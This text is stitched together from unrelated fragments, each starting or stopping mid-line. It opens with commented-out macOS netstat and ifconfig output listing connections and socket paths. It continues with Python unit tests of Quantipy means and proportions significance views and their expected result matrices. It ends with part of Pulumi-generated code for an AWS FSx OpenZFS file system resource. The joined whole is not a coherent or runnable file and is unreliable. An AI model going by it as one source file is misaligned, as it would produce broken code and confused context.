# inet 192.168.245.156 netmask 0xffffff00 broadcast 192.168.245.255
# nd6 options=201<PERFORMNUD,DAD>
# media: autoselect
# status: active
# > None
# **********************
# netstat
# Active Internet connections
# Proto Recv-Q Send-Q Local Address Foreign Address (state)
# tcp4 0 0 192.168.245.156.55554 whatsapp-cdn-shv.https ESTABLISHED
# tcp4 0 0 192.168.245.156.55393 ec2-52-5-133-92..https ESTABLISHED
# tcp4 0 0 192.168.245.156.55277 ec2-44-227-165-1.https ESTABLISHED
# tcp4 0 0 192.168.245.156.54721 server-13-35-238.https ESTABLISHED
# tcp4 0 0 192.168.245.156.54316 172.16.17.32.https ESTABLISHED
# tcp4 0 0 192.168.245.156.54123 sa-in-f108.1e100.imaps ESTABLISHED
# tcp4 0 0 192.168.245.156.54116 sa-in-f108.1e100.imaps ESTABLISHED
# tcp4 0 0 192.168.245.156.54115 sa-in-f108.1e100.imaps ESTABLISHED
# tcp4 0 0 192.168.245.156.54114 172.16.31.10.b.https ESTABLISHED
# tcp4 0 0 192.168.245.156.53202 192.168.3.11.https ESTABLISHED
# tcp4 0 0 192.168.245.156.52838 192.168.3.11.https ESTABLISHED
# tcp4 0 0 192.168.245.156.50577 172.16.58.3.b.https ESTABLISHED
# tcp4 0 0 192.168.245.156.50335 sd-in-f188.1e100.https ESTABLISHED
# tcp4 0 0 192.168.245.156.50334 ec2-18-205-93-20.https ESTABLISHED
# tcp4 0 0 192.168.245.156.50331 maa05s12-in-f14..http ESTABLISHED
# tcp4 0 0 192.168.245.156.50172 ec2-52-202-62-22.https ESTABLISHED
# tcp4 0 0 192.168.245.156.50163 192.168.3.11.https ESTABLISHED
# tcp4 0 0 192.168.245.156.49925 172.16.31.1016.5223 ESTABLISHED
# tcp4 0 0 localhost.46624 localhost.55525 TIME_WAIT
# tcp4 0 0 localhost.46624 localhost.55526 TIME_WAIT
# tcp4 0 0 localhost.55030 localhost.46624 TIME_WAIT
# tcp4 0 0 192.168.245.156.54138 172.16.31.10.b.https TIME_WAIT
# tcp4 0 0 localhost.46624 localhost.55548 TIME_WAIT
# tcp4 0 0 localhost.46624 localhost.55549 TIME_WAIT
# tcp4 0 0 localhost.46624 localhost.55572 TIME_WAIT
# tcp4 0 0 localhost.46624 localhost.55573 TIME_WAIT
# tcp4 0 0 localhost.46624 localhost.55590 TIME_WAIT
# tcp4 0 0 localhost.46624 localhost.55591 TIME_WAIT
# tcp4 0 0 localhost.46624 localhost.55612 TIME_WAIT
# tcp4 0 0 localhost.46624 localhost.55613 TIME_WAIT
# tcp4 0 0 localhost.46624 localhost.55634 TIME_WAIT
# tcp4 0 0 localhost.46624 localhost.55635 TIME_WAIT
# tcp4 0 0 localhost.46624 localhost.55657 TIME_WAIT
# tcp4 0 0 localhost.46624 localhost.55658 TIME_WAIT
# tcp4 0 0 localhost.46624 localhost.55663 TIME_WAIT
# udp4 0 0 192.168.245.156.53051 *.*
# udp4 0 0 192.168.245.156.57620 maa03s40-in-f10..https
# udp4 0 0 *.* *.*
# udp46 0 0 *.* *.*
# udp4 0 0 *.* *.*
# udp6 0 0 *.mdns *.*
# udp4 0 0 *.mdns *.*
# udp4 0 0 *.netbios-dgm *.*
# udp4 0 0 *.netbios-ns *.*
# Active Multipath Internet connections
# Proto/ID Flags Local Address Foreign Address (state)
# icm6 0 0 *.* *.*
# Active LOCAL (UNIX) domain sockets
# Address Type Recv-Q Send-Q Inode Conn Refs Nextref Addr
# 5264b0a3969d9ded stream 0 0 0 5264b0a3969d9d25 0 0 /var/run/mDNSResponder
# 5264b0a3969d9d25 stream 0 0 0 5264b0a3969d9ded 0 0
# 5264b0a3969d803d stream 0 0 0 5264b0a3969d7f75 0 0 /var/run/mDNSResponder
# 5264b0a3969d7f75 stream 0 0 0 5264b0a3969d803d 0 0
# 5264b0a3938a093d stream 0 0 5264b0a397538315 0 0 0 /var/<KEY>/.WhatsApp.cZpxak/SS
# 5264b0a3938a0c5d stream 0 0 0 5264b0a3938a0b95 0 0
# 5264b0a3938a0b95 stream 0 0 0 5264b0a3938a0c5d 0 0
# 5264b0a3938a02fd stream 0 0 0 5264b0a39389e7a5 0 0
# 5264b0a39389e7a5 stream 0 0 0 5264b0a3938a02fd 0 0
# 5264b0a3969d79fd stream 0 0 0 5264b0a3969d7935 0 0 /var/run/mDNSResponder
# 5264b0a3969d7935 stream 0 0 0 5264b0a3969d79fd 0 0
# 5264b0a3969da4f5 stream 0 0 0 5264b0a3969da42d 0 0
# 5264b0a3969da42d stream 0 0 0 5264b0a3969da4f5 0 0
# 5264b0a3969da365 stream 0 0 0 5264b0a3969da29d 0 0
# 5264b0a3969da29d stream 0 0 0 5264b0a3969da365 0 0
# 5264b0a3969da045 stream 0 0 0 5264b0a3969d9f7d 0 0
# 5264b0a3969d9f7d stream 0 0 0 5264b0a3969da045 0 0
# 5264b0a3969d9eb5 stream 0 0 0 5264b0a3938a0ded 0 0
# 5264b0a3938a0ded stream 0 0 0 5264b0a3969d9eb5 0 0
# 5264b0a3969d7b8d stream 0 0 0 5264b0a3969d7ac5 0 0 /var/folders/5p/2y6w9nfd4w3fl0vp97b1w_cc0000gn/T/CoreFxPipe_vscode.a01785ad790b74fd8ca4bcbca323cd37
# 5264b0a3969d7ac5 stream 0 0 0 5264b0a3969d7b8d 0 0
# 5264b0a39389e86d stream 0 0 5264b0a393a1e915 0 0 0 /var/<KEY>/CoreFxPipe_vscode.a01785ad790b74fd8ca4bcbca323cd37
# 5264b0a39389fcbd stream 0 0 5264b0a3973b1315 0 0 0 /var/folders/5p/2y6w9nfd4w3fl0vp97b1w_cc0000gn/T/dotnet-diagnostic-3990-1631870240-socket
# 5264b0a3938a0235 stream 0 0 0 5264b0a3938a0acd 0 0
# 5264b0a3938a0acd stream 0 0 0 5264b0a3938a0235 0 0
# 5264b0a3969d948d stream 0 0 0 5264b0a3969d9235 0 0
# 5264b0a3969d9235 stream 0 0 0 5264b0a3969d948d 0 0
# 5264b0a3969d90a5 stream 0 0 0 5264b0a3969d8fdd 0 0
# 5264b0a3969d8fdd stream 0 0 0 5264b0a3969d90a5 0 0
# 5264b0a39389fd85 stream 0 0 5264b0a3973b1415 0 0 0 /var/folders/5p/2y6w9nfd4w3fl0vp97b1w_cc0000gn/T/CoreFxPipe_f3e70055d3c346c989cd650448fde7d2
# 5264b0a3969d7d1d stream 0 0 0 5264b0a3969d7c55 0 0 /var/folders/5p/2y6w9nfd4w3fl0vp97b1w_cc0000gn/T/vscode-efbd5f63fa08af9a19f9c24f817de1d97dd704e1.sock
# 5264b0a3969d7c55 stream 0 0 0 5264b0a3969d7d1d 0 0
# 5264b0a3969da1d5 stream 0 0 0 5264b0a3969da10d 0 0
# 5264b0a3969da10d stream 0 0 0 5264b0a3969da1d5 0 0
# 5264b0a3938a0a05 stream 0 0 0 5264b0a3938a06e5 0 0 /var/folders/5p/2y6w9nfd4w3fl0vp97b1w_cc0000gn/T/vscode-5de46037824cb4b3aeff4ae54c5cc54c1556632e.sock
# 5264b0a3938a06e5 stream 0 0 0 5264b0a3938a0a05 0 0
# 5264b0a3938a14f5 stream 0 0 0 5264b0a3938a142d 0 0
# 5264b0a3938a142d stream 0 0 0 5264b0a3938a14f5 0 0
# 5264b0a3938a11d5 stream 0 0 0 5264b0a3938a110d 0 0
# 5264b0a3938a110d stream 0 0 0 5264b0a3938a11d5 0 0
# 5264b0a3938a1045 stream 0 0 0 5264b0a3938a048d 0 0
# 5264b0a3938a048d stream 0 0 0 5264b0a3938a1045 0 0
# 5264b0a39389fa65 stream 0 0 0 5264b0a39389e935 0 0
# 5264b0a39389e935 stream 0 0 0 5264b0a39389fa65 0 0
# 5264b0a39389e615 stream 0 0 5264b0a397384915 0 0 0 /var/folders/5p/2y6w9nfd4w3fl0vp97b1w_cc0000gn/T/vscode-5de46037824cb4b3aeff4ae54c5cc54c1556632e.sock
# 5264b0a3938a0d25 stream 0 0 5264b0a3969e3a15 0 0 0 /var/folders/5p/2y6w9nfd4w3fl0vp97b1w_cc0000gn/T/vscode-git-0dd8e09022.sock
# 5264b0a3938a1365 stream 0 0 0 5264b0a3938a129d 0 0 /var/run/mDNSResponder
# 5264b0a3938a129d stream 0 0 0 5264b0a3938a1365 0 0
# 5264b0a39389f99d stream 0 0 0 5264b0a39389f8d5 0 0
# 5264b0a39389f8d5 stream 0 0 0 5264b0a39389f99d 0 0
# 5264b0a3938a0875 stream 0 0 0 5264b0a3938a07ad 0 0
# 5264b0a3938a07ad stream 0 0 0 5264b0a3938a0875 0 0
# 5264b0a3938a016d stream 0 0 0 5264b0a3938a00a5 0 0 /var/run/mDNSResponder
# 5264b0a3938a00a5 stream 0 0 0 5264b0a3938a016d 0 0
# 5264b0a39389f67d stream 0 0 0 5264b0a39389f5b5 0 0
# 5264b0a39389f5b5 stream 0 0 0 5264b0a39389f67d 0 0
# 5264b0a39389f425 stream 0 0 0 5264b0a39389f295 0 0 /var/folders/5p/2y6w9nfd4w3fl0vp97b1w_cc0000gn/T/vscode-ipc-563afa84-ef7c-45dd-bd14-65fb71fae75a.sock
# 5264b0a39389f295 stream 0 0 0 5264b0a39389f425 0 0
# 5264b0a39389f1cd stream 0 0 0 5264b0a39389f105 0 0
# 5264b0a39389f105 stream 0 0 0 5264b0a39389f1cd 0 0
# 5264b0a39389f03d stream 0 0 0 5264b0a39389ef75 0 0
# 5264b0a39389ef75 stream 0 0 0 5264b0a39389f03d 0 0
# 5264b0a39389eead stream 0 0 0 5264b0a39389ede5 0 0
# 5264b0a39389ede5 stream 0 0 0 5264b0a39389eead 0 0
# 5264b0a39389ed1d stream 0 0 0 5264b0a39389ec55 0 0
# 5264b0a39389ec55 stream 0 0 0 5264b0a39389ed1d 0 0
# 5264b0a39389eb8d stream 0 0 0 5264b0a39389eac5 | |
}
}
})
mean_sig.add_method(name='DIM_means_test',
kwargs={'text': 'SIG (means)'})
self.stack.add_link(data_keys='testing', x=x, y=y,
views=mean_sig, weights='weight_a')
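        # View keys below follow Quantipy's pipe-separated notation (assumed):
        # 'axis|method|relation|rel_to|weights|name', e.g. 't.means.Dim.05'
        # is a Dimensions-mimic means test at the 0.05 significance level.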
view = self.stack['testing']['no_filter'][x][y]['x|t.means.Dim.05|x:||weight_a|DIM_means_test']
meta = self.stack['testing']['no_filter'][x][y]['x|t.means.Dim.05|x:||weight_a|DIM_means_test'].meta()
sig_result = [['NONE', 'NONE', 'NONE', '[1, 2]', '[1, 2, 3]']]
meta_siglevel = 0.05
self.assertEqual(view.dataframe.replace(np.NaN, 'NONE').values.tolist(),
sig_result)
self.assertEqual(view.is_meanstest(), meta_siglevel)
def test_means_test_level_20_weighted_no_missings(self):
views = QuantipyViews(['counts', 'cbase'])
x = 'q5_1'
y = 'locality'
self.setup_stack(
views=views,
x=x,
y=y,
weights='weight_a'
)
means = ViewMapper(
template={
'method': QuantipyViews().descriptives,
'kwargs': {}
})
means.add_method(name='excl_9798',
                         kwargs={'text': '(no missings)',
'exclude': [97, 98],
'axis': 'x'})
self.stack.add_link(data_keys='testing', x=x, y=y,
views=means.subset('excl_9798'), weights='weight_a')
mean_sig = ViewMapper(
template={
'method': QuantipyViews().coltests,
'kwargs': {
'metric': 'means',
'stack': self.stack,
'iterators': {
'level': [0.20]
}
}
})
mean_sig.add_method(name='DIM_means_test',
kwargs={'text': 'SIG (means)'})
self.stack.add_link(data_keys='testing', x=x, y=y,
views=mean_sig, weights='weight_a')
view = self.stack['testing']['no_filter'][x][y]['x|t.means.Dim.20|x[{1,2,3,4,5}]:||weight_a|DIM_means_test']
meta = self.stack['testing']['no_filter'][x][y]['x|t.means.Dim.20|x[{1,2,3,4,5}]:||weight_a|DIM_means_test'].meta()
sig_result = [['NONE', '[1, 3]', 'NONE', 'NONE', 'NONE']]
meta_siglevel = 0.20
self.assertEqual(view.dataframe.replace(np.NaN, 'NONE').values.tolist(),
sig_result)
self.assertEqual(view.is_meanstest(), meta_siglevel)
def test_means_test_level_10_unweighted_ovlp_no_missings(self):
views = QuantipyViews(['counts', 'cbase'])
x = 'q5_1'
y = 'q3'
self.setup_stack(
views=views,
x=x,
y=y
)
means = ViewMapper(
template={
'method': QuantipyViews().descriptives,
'kwargs': {}
})
means.add_method(name='excl_9798',
                         kwargs={'text': '(no missings)',
'exclude': [97, 98],
'axis': 'x'})
self.stack.add_link(data_keys='testing', x=x, y=y,
views=means.subset('excl_9798'))
mean_sig = ViewMapper(
template={
'method': QuantipyViews().coltests,
'kwargs': {
'metric': 'means',
'stack': self.stack,
'iterators': {
'level': ['low']
}
}
})
mean_sig.add_method(name='DIM_means_test',
kwargs={'text': 'SIG (means)'})
self.stack.add_link(data_keys='testing', x=x, y=y,
views=mean_sig)
view = self.stack['testing']['no_filter'][x][y]['x|t.means.Dim.10|x[{1,2,3,4,5}]:|||DIM_means_test']
meta = self.stack['testing']['no_filter'][x][y]['x|t.means.Dim.10|x[{1,2,3,4,5}]:|||DIM_means_test'].meta()
sig_result = [['[5]', '[5]', '[1, 2, 5, 6, 7, 97]', '[5]', 'NONE', '[5]', '[5]', '[5]', 'NONE']]
meta_siglevel = 0.10
self.assertEqual(view.dataframe.replace(np.NaN, 'NONE').values.tolist(),
sig_result)
self.assertEqual(view.is_meanstest(), meta_siglevel)
def test_means_test_level_high_askia_unweighted_all_codes(self):
views = QuantipyViews(['counts', 'cbase'])
x = 'q5_1'
y = 'locality'
self.setup_stack(
views=views,
x=x,
y=y,
weights=None
)
means = ViewMapper(
template={
'method': QuantipyViews().descriptives,
'kwargs': {}
})
means.add_method(name='all',
                         kwargs={'text': '(all codes)',
'axis': 'x'})
self.stack.add_link(data_keys='testing', x=x, y=y,
views=means.subset('all'), weights=None)
mean_sig = ViewMapper(
template={
'method': QuantipyViews().coltests,
'kwargs': {
'metric': 'means',
'stack': self.stack,
'iterators': {
'level': ['high']
}
}
})
mean_sig.add_method(name='askia_means_test',
kwargs={'text': 'SIG (means)',
'mimic': 'askia'})
self.stack.add_link(data_keys='testing', x=x, y=y,
views=mean_sig, weights=None)
view = self.stack['testing']['no_filter'][x][y]['x|t.means.askia.01|x:|||askia_means_test']
meta = self.stack['testing']['no_filter'][x][y]['x|t.means.askia.01|x:|||askia_means_test'].meta()
sig_result = [['NONE', '[1]', '[1]', '[1, 2, 3]', '[1, 2, 3, 4]']]
meta_siglevel = 0.01
self.assertEqual(view.dataframe.replace(np.NaN, 'NONE').values.tolist(),
sig_result)
self.assertEqual(view.is_meanstest(), meta_siglevel)
''' props_test views: Tests that tests of proportion significance are yielding the correct results '''
def test_props_test_level_20_weighted(self):
views = QuantipyViews(['counts', 'cbase'])
x = 'q1'
y = 'locality'
self.setup_stack(
views=views,
x=x,
y=y,
weights='weight_a'
)
prop_sig = ViewMapper(
template={
'method': QuantipyViews().coltests,
'kwargs': {
'rel_to': 'y',
'metric': 'props',
'stack': self.stack,
'iterators': {
'level': [0.20]
}
}
})
prop_sig.add_method(name='DIM_props_test',
kwargs={'text': 'sig without overlap'})
self.stack.add_link(data_keys='testing', x=x, y=y,
views=prop_sig, weights='weight_a')
view = self.stack['testing']['no_filter'][x][y]['x|t.props.Dim.20|:|y|weight_a|DIM_props_test']
meta = self.stack['testing']['no_filter'][x][y]['x|t.props.Dim.20|:|y|weight_a|DIM_props_test'].meta()
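        # Each cell lists the codes of the columns this column tests
        # significantly higher than; 'NONE' marks cells with no significant
        # result (interpretation assumed from the Dimensions mimic).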
sig_result = [['[2, 3, 4, 5]', '[4]', 'NONE', 'NONE', 'NONE'],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', '[1, 4]', 'NONE', 'NONE', '[4]'],
['[2, 5]', 'NONE', '[5]', '[2, 5]', 'NONE'],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', '[1]', '[1]', 'NONE', 'NONE'],
['NONE', 'NONE', 'NONE', '[1]', '[1]'],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['[2, 3]', 'NONE', 'NONE', 'NONE', '[2, 3]'],
['[3]', '[1, 3]', 'NONE', '[3]', '[3]']]
meta_agg_text = 'sig without overlap'
meta_siglevel = 0.2
self.assertEqual(view.dataframe.replace(np.NaN, 'NONE').values.tolist(), sig_result)
self.assertEqual(meta['agg']['text'], meta_agg_text)
self.assertEqual(view.is_propstest(), meta_siglevel)
def test_props_test_level_5_ovlp_unweighted(self):
views = QuantipyViews(['counts', 'cbase'])
x = 'q5_1'
y = 'q3'
self.setup_stack(
views=views,
x=x,
y=y
)
prop_sig = ViewMapper(
template={
'method': QuantipyViews().coltests,
'kwargs': {
'rel_to': 'y',
'stack': self.stack,
'iterators': {
'level': ['mid']
}
}
})
prop_sig.add_method(name='DIM_props_test',
kwargs={'text': 'SIG (props)'})
self.stack.add_link(data_keys='testing', x=x, y=y,
views=prop_sig, weights=None)
view = self.stack['testing']['no_filter'][x][y]['x|t.props.Dim.05|:|y||DIM_props_test']
meta = self.stack['testing']['no_filter'][x][y]['x|t.props.Dim.05|:|y||DIM_props_test'].meta()
sig_result = [['[2, 3]', 'NONE', 'NONE', 'NONE', '[1, 2, 3, 4, 6, 7, 8, 97]', 'NONE', '[2, 3]', '[2, 3, 97]', 'NONE'],
['[3, 97]', '[1, 3, 97]', '[97]', '[3, 97]', '[1, 2, 3, 4, 7, 97]', '[1, 2, 3, 4, 7, 97]', '[1, 3, 97]', '[3, 97]', 'NONE'],
['[2, 3, 4, 8, 97]', '[8, 97]', '[2, 4, 8, 97]', '[97]', '[97]', '[97]', '[2, 4, 8, 97]', '[97]', 'NONE'],
['[3]', '[3]', 'NONE', '[1, 2, 3, 5, 6, 7, 97]', 'NONE', 'NONE', 'NONE', '[1, 2, 3, 4, 5, 6, 7, 97]', '[1, 2, 3, 7]'],
['[97]', '[97]', '[97]', '[97]', '[97]', '[97]', '[97]', '[97]', 'NONE'],
['NONE', '[1, 5, 7]', '[1, 5, 7]', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', '[1, 2, 3, 4, 5, 6, 7, 8]'],
['[5, 6]', '[1, 5, 6, 7, 8]', '[1, 2, 4, 5, 6, 7, 8]', '[6]', 'NONE', 'NONE', '[6]', 'NONE', '[1, 2, 3, 4, 5, 6, 7, 8]']]
meta_agg_text = 'SIG (props)'
meta_siglevel = 0.05
self.assertEqual(view.dataframe.replace(np.NaN, 'NONE').values.tolist(), sig_result)
self.assertEqual(meta['agg']['text'], meta_agg_text)
self.assertEqual(view.is_propstest(), meta_siglevel)
def test_props_test_level_1_ovlp_weighted(self):
views = QuantipyViews(['counts', 'cbase'])
x = 'q9'
y = 'q8'
self.setup_stack(
views=views,
x=x,
y=y,
weights='weight_a'
)
prop_sig = ViewMapper(
template={
'method': QuantipyViews().coltests,
'kwargs': {
'rel_to': 'y',
'metric': 'props',
'stack': self.stack,
'iterators': {
'level': [0.01]
}
}
})
prop_sig.add_method(name='DIM_props_test',
kwargs={'text': 'SIG (props, strict)'})
self.stack.add_link(data_keys='testing', x=x, y=y,
views=prop_sig, weights='weight_a')
view = self.stack['testing']['no_filter'][x][y]['x|t.props.Dim.01|:|y|weight_a|DIM_props_test']
meta = self.stack['testing']['no_filter'][x][y]['x|t.props.Dim.01|:|y|weight_a|DIM_props_test'].meta()
sig_result = [['NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', 'NONE', '[1, 96]', '[96]', '[96]', 'NONE', 'NONE'],
['NONE', 'NONE', '[4]', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', 'NONE', '[98]', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', '[3]', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE']]
meta_agg_text = 'SIG (props, strict)'
meta_siglevel = 0.01
self.assertEqual(view.dataframe.replace(np.NaN, 'NONE').values.tolist(), sig_result)
self.assertEqual(meta['agg']['text'], meta_agg_text)
self.assertEqual(view.is_propstest(), meta_siglevel)
def test_props_means_tests_incl_total(self):
views = ['counts', 'mean']
x, y = 'q7_1', 'q8'
self.setup_stack(
views=views,
x=x,
y=y,
weights='weight_a'
)
tests = ViewMapper()
tests.make_template('coltests', iterators={'metric': ['props', 'means']})
tests.add_method(name='total_tests', kwargs={'test_total': True})
self.stack.add_link(data_keys='testing', x=x, y=y,
views=tests, weights='weight_a')
link = self.stack['testing']['no_filter'][x][y]
props_view = link['x|t.props.Dim.10+@|:||weight_a|total_tests']
means_view = link['x|t.means.Dim.10+@|x:||weight_a|total_tests']
props_results = [['NONE', "['@L', 1, 3, 4, 5, 96]", 'NONE', '[5]', "['@H']", 'NONE', 'NONE'],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['[4]', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', 'NONE', 'NONE', 'NONE', '[96]', 'NONE', 'NONE'],
['[5]', '[5]', 'NONE', '[5]', "['@H']", "['@L', 5]", "['@L', 1, 3, 4, 5]"],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE']]
means_result = [['NONE', 'NONE', 'NONE', 'NONE', 'NONE', "['@L', 2]", 'NONE']]
self.assertEqual(props_view.dataframe.replace(np.NaN, 'NONE').values.tolist(),
props_results)
self.assertEqual(means_view.dataframe.replace(np.NaN, 'NONE').values.tolist(),
means_result)
def test_means_tests_code_exclusion_incl_total(self):
views = ['counts']
x, y = 'q7_1', 'q8'
self.setup_stack(
views=views,
x=x,
y=y,
weights='weight_a'
)
mean = ViewMapper()
mean.make_template('descriptives', iterators={'stats': ['mean']})
mean.add_method(name='excl. 6,8', kwargs={'exclude': [6, 8], 'axis': 'x'})
self.stack.add_link(data_keys='testing', x=x, y=y,
views=mean, weights=None)
tests = ViewMapper()
tests.make_template('coltests', iterators={'metric': ['means']})
tests.add_method(name='total_tests', kwargs={'test_total': True})
self.stack.add_link(data_keys='testing', x=x, y=y,
views=tests, weights=None)
link = self.stack['testing']['no_filter'][x][y]
means_view = link['x|t.means.Dim.10+@|x[{1,2,3,4,5,7,9}]:|||total_tests']
means_result = [["['@L', 98]", '[98]', '[98]', "['@L', 98]", '[98]', '[98]', "['@H']"]]
self.assertEqual(means_view.dataframe.replace(np.NaN, 'NONE').values.tolist(),
means_result)
def test_means_tests_code_exclusion_base_flags_incl_total(self):
views = ['counts']
x, y = 'q7_1', 'q8'
self.setup_stack(
views=views,
x=x,
y=y,
weights='weight_a'
)
mean = ViewMapper()
mean.make_template('descriptives', iterators={'stats': ['mean']})
mean.add_method(name='excl. 6,8', kwargs={'exclude': [6, 8],
'axis': 'x'})
self.stack.add_link(data_keys='testing', x=x, y=y,
views=mean, weights=None)
tests = ViewMapper()
tests.make_template('coltests', iterators={'metric': ['means']})
tests.add_method(name='total_tests_flags',
kwargs={'test_total': True,
'flag_bases': [30, 100]})
self.stack.add_link(data_keys='testing', x=x, y=y,
views=tests, weights=None)
link = self.stack['testing']['no_filter'][x][y]
means_view = link['x|t.means.Dim.10+@|x[{1,2,3,4,5,7,9}]:|||total_tests_flags']
means_result = [["['@L']", '*', 'NONE', "['@L']", 'NONE', '*', '**']]
self.assertEqual(means_view.dataframe.replace(np.NaN, 'NONE').values.tolist(),
means_result)
def test_props_blocknet_calc_incl_total(self):
from operator import add, sub
views = ['counts']
x, y = 'q7_1', 'q8'
self.setup_stack(
views=views,
x=x,
y=y,
weights='weight_a'
)
nets = ViewMapper()
nets.make_template('frequency')
nets_def = [{'Z': [1, 2, 3], 'expand': 'after',
'text': {'en-GB': 'some text1'}},
{'A': [4, 5],
'text': {'en-GB': 'some text2'}},
{'F': [6, 7, 8], 'expand': 'before',
'text': {'en-GB': 'some text3'}}]
calc = {'my_calc': ('Z', sub, 'F')}
nets.add_method(name='blocknet',
kwargs={'logic': nets_def,
'axis': 'x',
'complete': True,
'calc': calc})
self.stack.add_link(data_keys='testing', x=x, y=y,
views=nets, weights='weight_a')
tests = ViewMapper()
tests.make_template('coltests', iterators={'metric': ['props']})
tests.add_method(name='total_tests_blocks',
kwargs={'test_total': True})
self.stack.add_link(data_keys='testing', x=x, y=y,
views=tests, weights='weight_a')
link = self.stack['testing']['no_filter'][x][y]
nets_view = link['x|t.props.Dim.10+@|x[{1,2,3}+],x[{4,5}],x[+{6,7,8}],x[{1,2,3}-{6,7,8}]*:||weight_a|total_tests_blocks']
nets_result = [["['@H']", 'NONE', '[1]', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', "['@L', 1, 3, 4, 5, 96]", 'NONE', '[5]', "['@H']", 'NONE', 'NONE'],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['[4]', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['[4]', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', 'NONE', 'NONE', 'NONE', '[96]', 'NONE', 'NONE'],
['[5]', '[5]', 'NONE', '[5]', "['@H']", "['@L', 5]", "['@L', 1, 3, 4, 5]"],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE'],
['NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE', 'NONE']]
self.assertEqual(nets_view.dataframe.replace(np.NaN, 'NONE').values.tolist(),
nets_result)
def test_props_changed_meta_nets_incl_total(self):
| |
None,
weekly_maintenance_start_time: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = OpenZfsFileSystemArgs.__new__(OpenZfsFileSystemArgs)
__props__.__dict__["automatic_backup_retention_days"] = automatic_backup_retention_days
__props__.__dict__["backup_id"] = backup_id
__props__.__dict__["copy_tags_to_backups"] = copy_tags_to_backups
__props__.__dict__["copy_tags_to_volumes"] = copy_tags_to_volumes
__props__.__dict__["daily_automatic_backup_start_time"] = daily_automatic_backup_start_time
if deployment_type is None and not opts.urn:
raise TypeError("Missing required property 'deployment_type'")
__props__.__dict__["deployment_type"] = deployment_type
__props__.__dict__["disk_iops_configuration"] = disk_iops_configuration
__props__.__dict__["kms_key_id"] = kms_key_id
__props__.__dict__["root_volume_configuration"] = root_volume_configuration
__props__.__dict__["security_group_ids"] = security_group_ids
__props__.__dict__["storage_capacity"] = storage_capacity
__props__.__dict__["storage_type"] = storage_type
if subnet_ids is None and not opts.urn:
raise TypeError("Missing required property 'subnet_ids'")
__props__.__dict__["subnet_ids"] = subnet_ids
__props__.__dict__["tags"] = tags
__props__.__dict__["tags_all"] = tags_all
if throughput_capacity is None and not opts.urn:
raise TypeError("Missing required property 'throughput_capacity'")
__props__.__dict__["throughput_capacity"] = throughput_capacity
__props__.__dict__["weekly_maintenance_start_time"] = weekly_maintenance_start_time
__props__.__dict__["arn"] = None
__props__.__dict__["dns_name"] = None
__props__.__dict__["network_interface_ids"] = None
__props__.__dict__["owner_id"] = None
__props__.__dict__["root_volume_id"] = None
__props__.__dict__["vpc_id"] = None
super(OpenZfsFileSystem, __self__).__init__(
'aws:fsx/openZfsFileSystem:OpenZfsFileSystem',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
arn: Optional[pulumi.Input[str]] = None,
automatic_backup_retention_days: Optional[pulumi.Input[int]] = None,
backup_id: Optional[pulumi.Input[str]] = None,
copy_tags_to_backups: Optional[pulumi.Input[bool]] = None,
copy_tags_to_volumes: Optional[pulumi.Input[bool]] = None,
daily_automatic_backup_start_time: Optional[pulumi.Input[str]] = None,
deployment_type: Optional[pulumi.Input[str]] = None,
disk_iops_configuration: Optional[pulumi.Input[pulumi.InputType['OpenZfsFileSystemDiskIopsConfigurationArgs']]] = None,
dns_name: Optional[pulumi.Input[str]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
network_interface_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
owner_id: Optional[pulumi.Input[str]] = None,
root_volume_configuration: Optional[pulumi.Input[pulumi.InputType['OpenZfsFileSystemRootVolumeConfigurationArgs']]] = None,
root_volume_id: Optional[pulumi.Input[str]] = None,
security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
storage_capacity: Optional[pulumi.Input[int]] = None,
storage_type: Optional[pulumi.Input[str]] = None,
subnet_ids: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
throughput_capacity: Optional[pulumi.Input[int]] = None,
